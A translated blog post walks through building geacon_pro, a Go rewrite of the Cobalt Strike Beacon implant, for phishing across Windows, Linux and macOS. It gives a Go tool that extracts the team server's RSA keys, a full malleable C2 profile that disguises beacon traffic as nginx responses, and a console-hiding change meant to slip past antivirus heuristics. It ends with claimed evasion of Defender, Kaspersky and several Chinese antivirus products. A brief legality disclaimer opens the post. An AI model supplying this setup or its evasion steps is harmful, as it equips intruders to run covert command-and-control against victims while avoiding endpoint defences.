
An open-source Beacon rewritten in Go

Author: 區塊軟體開發

Please comply with applicable laws and regulations. This article is meant to help improve the response of security software; illegal use is strictly prohibited.

0x01 Project overview

Beacon has been rewritten in Go. The advantage of a Go rewrite is that the same source builds CS implants for Windows, Linux and macOS, which makes cross-platform phishing and getting hosts to check in to Cobalt Strike convenient; the drawback is binary size, a little over 5 MB after compilation.

Project URL: https://github.com/H4de5-7/geacon_pro

0x02 Build process

Three things have to be changed: the team server's public/private key pair, the listener's address and port, and the profile.

The team server's key pair lives in the file .cobaltstrike.beacon_keys, which is a Java-serialized java.security.KeyPair, so a tool is needed to pull the RSA keys out of it; refer to the geacon project's extractor, or use the BeaconTool.jar I built.

Put the extracted public and private key into config.go in place of the ones there, and point the C2 address in config.go at the listener's address and port.
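The extraction step does not need Java. The following is an added example, not the BeaconTool.jar from this post nor geacon's own tool: it scans the serialized KeyPair for the DER-encoded SubjectPublicKeyInfo and PKCS#8 blobs that Java's KeyRep embeds, parses them with crypto/x509, checks that they belong to the same modulus, and prints PEM. Because the real file cannot be shipped here, BuildSampleBlob constructs a look-alike around a freshly generated key; the function names, the decoy bytes and the assumption that config.go accepts PEM (or its base64 body) are mine, not the project's.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"encoding/pem"
	"errors"
	"fmt"
	"os"
)

// derCandidates returns every slice of blob starting with a DER SEQUENCE tag (0x30) and a
// long-form length (0x81 xx or 0x82 xx xx) that fits inside blob. RSA SubjectPublicKeyInfo and
// PKCS#8 always use these forms, so this locates the keys without parsing the Java framing.
func derCandidates(blob []byte) [][]byte {
	var out [][]byte
	for i := 0; i+3 < len(blob); i++ {
		if blob[i] != 0x30 {
			continue
		}
		var n, hdr int
		switch blob[i+1] {
		case 0x81:
			n, hdr = int(blob[i+2]), 3
		case 0x82:
			n, hdr = int(blob[i+2])<<8|int(blob[i+3]), 4
		default:
			continue
		}
		if end := i + hdr + n; end <= len(blob) {
			out = append(out, blob[i:end])
		}
	}
	return out
}

// ExtractBeaconKeys pulls the RSA public key (SubjectPublicKeyInfo) and private key (PKCS#8)
// out of a Java-serialized java.security.KeyPair, the layout of .cobaltstrike.beacon_keys.
func ExtractBeaconKeys(blob []byte) (*rsa.PublicKey, *rsa.PrivateKey, error) {
	var pub *rsa.PublicKey
	var priv *rsa.PrivateKey
	for _, c := range derCandidates(blob) {
		if k, err := x509.ParsePKIXPublicKey(c); err == nil {
			if r, ok := k.(*rsa.PublicKey); ok && pub == nil {
				pub = r
			}
			continue
		}
		if k, err := x509.ParsePKCS8PrivateKey(c); err == nil {
			if r, ok := k.(*rsa.PrivateKey); ok && priv == nil {
				priv = r
			}
		}
	}
	switch {
	case pub == nil:
		return nil, nil, errors.New("no RSA public key found")
	case priv == nil:
		return nil, nil, errors.New("no RSA private key found")
	case pub.N.Cmp(priv.N) != 0:
		return nil, nil, errors.New("public and private key do not belong together")
	}
	return pub, priv, nil
}

// ToPEM renders the pair as PEM. Whether config.go wants the armoured form or only the base64
// body is an assumption to check against the project; the base64 is the same DER either way.
func ToPEM(pub *rsa.PublicKey, priv *rsa.PrivateKey) (string, string) {
	pubDER, _ := x509.MarshalPKIXPublicKey(pub)     // only fails for unsupported key types
	privDER, _ := x509.MarshalPKCS8PrivateKey(priv) // same
	return string(pem.EncodeToMemory(&pem.Block{Type: "PUBLIC KEY", Bytes: pubDER})),
		string(pem.EncodeToMemory(&pem.Block{Type: "PRIVATE KEY", Bytes: privDER}))
}

// BuildSampleBlob is a constructed stand-in for .cobaltstrike.beacon_keys. The real file comes
// from Java's ObjectOutputStream; only its gross shape (magic, class names, DER keys) is imitated.
func BuildSampleBlob(priv *rsa.PrivateKey) []byte {
	pubDER, _ := x509.MarshalPKIXPublicKey(&priv.PublicKey)
	privDER, _ := x509.MarshalPKCS8PrivateKey(priv)
	blob := []byte{0xac, 0xed, 0x00, 0x05, 0x73, 0x72} // stream magic, version, TC_OBJECT, TC_CLASSDESC
	blob = append(blob, "java.security.KeyPair"...)
	blob = append(blob, 0x30, 0x82, 0x00, 0x05, 0xde, 0xad, 0xbe, 0xef, 0x00) // decoy: valid length, not a key
	blob = append(blob, "java.security.KeyRep"...)
	blob = append(blob, privDER...)
	blob = append(blob, "java.security.KeyRep"...)
	return append(blob, pubDER...)
}

func main() {
	key, _ := rsa.GenerateKey(rand.Reader, 1024) // Cobalt Strike's beacon keys are 1024-bit RSA
	blob := BuildSampleBlob(key)                 // for a real file: blob, _ = os.ReadFile(".cobaltstrike.beacon_keys")
	pub, priv, err := ExtractBeaconKeys(blob)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	pubPEM, privPEM := ToPEM(pub, priv)
	fmt.Print(pubPEM, privPEM)
}
```

Scanning for DER headers rather than decoding the Java object stream keeps the tool independent of the JDK version that wrote the file; the modulus comparison at the end is what catches a blob that happens to contain an unrelated key (or a stale one) alongside the pair you want.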

The profile shipped by the author throws an error when used as-is and needs a few edits; the version I ended up with is below.

# sleeptime is in milliseconds: 3 s between check-ins (the stock profile's default is 60 s)
set sleeptime "3000";

https-certificate {
    set C "KZ";
    set CN "foren.zik";
    set O "NN Fern Sub";
    set OU "NN Fern";
    set ST "KZ";
    set validity "365";
}

# define indicators for an HTTP GET
http-get {

    set uri "/www/handle/doc";

    client {
        #header "Host" "aliyun.com";
        # base64url-encode the session metadata and carry it in the Cookie header.
        metadata {
            base64url;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Server" "nginx/1.10.3 (Ubuntu)";
        header "Content-Type" "application/octet-stream";
        header "Connection" "keep-alive";
        header "Vary" "Accept";
        header "Pragma" "public";
        header "Expires" "0";
        header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

        # tasks go back masked and netbios-encoded, wrapped as data=...%% in the body
        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}

# define indicators for an HTTP POST
http-post {
    # Beacon picks randomly from this pool if several URIs are given
    set uri "/IMXo";
    client {
        #header "Content-Type" "application/octet-stream";

        # the session id travels in a custom "User" header as user=...%%
        id {
            mask;
            netbiosu;
            prepend "user=";
            append "%%";
            header "User";
        }

        # posted output is masked and base64url-encoded, wrapped as data=...%% in the body
        output {
            mask;
            base64url;
            prepend "data=";
            append "%%";
            print;
        }
    }

    # The server's response to our HTTP POST
    server {
        header "Server" "nginx/1.10.3 (Ubuntu)";
        header "Content-Type" "application/octet-stream";
        header "Connection" "keep-alive";
        header "Vary" "Accept";
        header "Pragma" "public";
        header "Expires" "0";
        header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

        # the POST response carries no data; this only shapes the (empty) body
        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}

Before building, install the missing dependencies. Go module downloads are blocked from mainland China and cannot be fetched directly, so point GOPROXY at a domestic mirror or use another way of fetching the modules.

0x03 Code changes

Any open-source evasion project stops evading after a while. To keep this one undetected for longer, change the code yourself. The README says to build for Windows with -ldflags "-H windowsgui -s -w": -s -w strip the symbol table and DWARF debug information to shrink the binary, and -H windowsgui sets the GUI subsystem so no console window appears. That subsystem option is commonly what AV picks up on, so here the console is hidden from code instead:

func HideWindow() {
    // GetConsoleWindow returns the console attached to this process, or 0 if there is none.
    console := w32.GetConsoleWindow()
    if console == 0 {
        return // no console attached
    }
    // Only hide the console if this process is the one that created it. When the
    // binary is started from an existing cmd.exe the console belongs to that shell,
    // and hiding it would make the operator's own terminal vanish.
    _, consoleProcID := w32.GetWindowThreadProcessId(console)
    if w32.GetCurrentProcessId() == consoleProcID {
        w32.ShowWindowAsync(console, w32.SW_HIDE)
    }
}

Add this function, call HideWindow() at the start of main, and build without -H windowsgui (-s -w are independent of it and can stay). Two things to know: w32 here is a Win32 binding such as gonutz/w32, which must be imported (the post does not say which binding the project uses, so treat that as an assumption); and because the binary is still a console-subsystem executable, Windows creates the console before main runs, so the window flashes briefly before ShowWindowAsync hides it. After reading through the rest of the code, other parts can be changed as you see fit.

0x04 Results

360 Guard (with Core Crystal protection), 360 Antivirus, Huorong, Tencent PC Manager:
[screenshot]

Defender:
[screenshot]

Kaspersky Free:
[screenshot]

All of them check in to the team server:
[screenshot]